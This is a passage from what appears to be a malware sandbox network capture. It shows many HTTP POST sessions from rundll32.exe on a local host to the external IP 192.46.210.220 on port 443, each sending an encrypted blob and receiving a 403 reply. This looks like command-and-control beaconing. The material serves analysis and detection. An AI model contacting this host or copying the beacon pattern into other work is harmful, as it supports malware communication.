2021-10-28 02:52:12 UTC | 184 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:12 UTC | 193 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:12 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
38 | 192.168.2.5 | 49913 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:12 UTC | 188 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:12 UTC | 188 | OUT | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:13 UTC | 193 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:13 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
39 | 192.168.2.5 | 49920 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:15 UTC | 193 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:15 UTC | 194 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:16 UTC | 203 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:16 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.5 | 49766 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:51:05 UTC | 19 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:51:05 UTC | 19 | OUT | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:51:06 UTC | 24 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:51:06 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
40 | 192.168.2.5 | 49921 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:16 UTC | 198 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:16 UTC | 198 | OUT | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:17 UTC | 203 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:17 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
41 | 192.168.2.5 | 49927 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:19 UTC | 203 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:19 UTC | 203 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:20 UTC | 213 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:20 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
42 | 192.168.2.5 | 49929 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:20 UTC | 208 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:20 UTC | 208 | OUT | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:21 UTC | 213 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:20 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
43 | 192.168.2.5 | 49936 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:24 UTC | 213 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:24 UTC | 213 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:24 UTC | 223 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:24 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
44 | 192.168.2.5 | 49937 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:24 UTC | 218 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:24 UTC | 218 | OUT | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:25 UTC | 223 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:25 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
45 | 192.168.2.5 | 49944 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:28 UTC | 223 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:28 UTC | 223 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:28 UTC | 233 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:28 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
46 | 192.168.2.5 | 49945 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:28 UTC | 228 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4844
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:28 UTC | 228 | OUT | Data Raw: 79 e7 fd 16 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: y&RW=LqDQQa:H}nKIX+t.jB`3k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:29 UTC | 233 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:29 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
47 | 192.168.2.5 | 49953 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:31 UTC | 233 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4832
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:52:31 UTC | 233 | OUT | Data Raw: 44 a4 de cc 10 0b 26 a3 52 ba 57 a3 18 3d 4c 97 b5 f8 71 f0 ab fd a2 44 51 16 db c1 8f 51 97 1e f8 a6 b9 61 3a 03 d8 b5 93 f8 f7 b9 81 48 9d 8b ad b0 7d 6e c6 08 4b 49 58 2b d6 0c 74 13 2e a7 6a fd 91 00 42 f7 60 c6 0b ec 8b 33 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: D&RW=LqDQQa:H}nKIX+t.jB`3kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:52:32 UTC | 243 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:52:32 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
48 | 192.168.2.5 | 49955 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:32 UTC | 238 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:33 UTC | 243 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:32 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
49 | 192.168.2.5 | 49968 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:35 UTC | 243 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:36 UTC | 253 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:36 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.5 | 49772 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:51:09 UTC | 24 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:51:09 UTC | 34 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:51:09 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
50 | 192.168.2.5 | 49972 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:36 UTC | 248 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:36 UTC | 253 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:36 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
51 | 192.168.2.5 | 49987 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:39 UTC | 253 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:40 UTC | 263 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:40 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
52 | 192.168.2.5 | 49988 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:40 UTC | 258 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:40 UTC | 263 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:40 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
53 | 192.168.2.5 | 49995 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:44 UTC | 263 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4844
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:45 UTC | 273 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:45 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
54 | 192.168.2.5 | 49996 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:44 UTC | 268 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
Content-Length: 4832
Connection: Close
Cache-Control: no-cache
2021-10-28 02:52:45 UTC | 273 | IN | HTTP/1.1 403 Forbidden
Server: nginx/1.15.12
Date: Thu, 28 Oct 2021 02:52:45 GMT
Content-Type: text/plain; charset=utf-8
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
55 | 192.168.2.5 | 50003 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:52:48 UTC | 273 | OUT | POST / HTTP/1.1
Host: 192.46.210.220
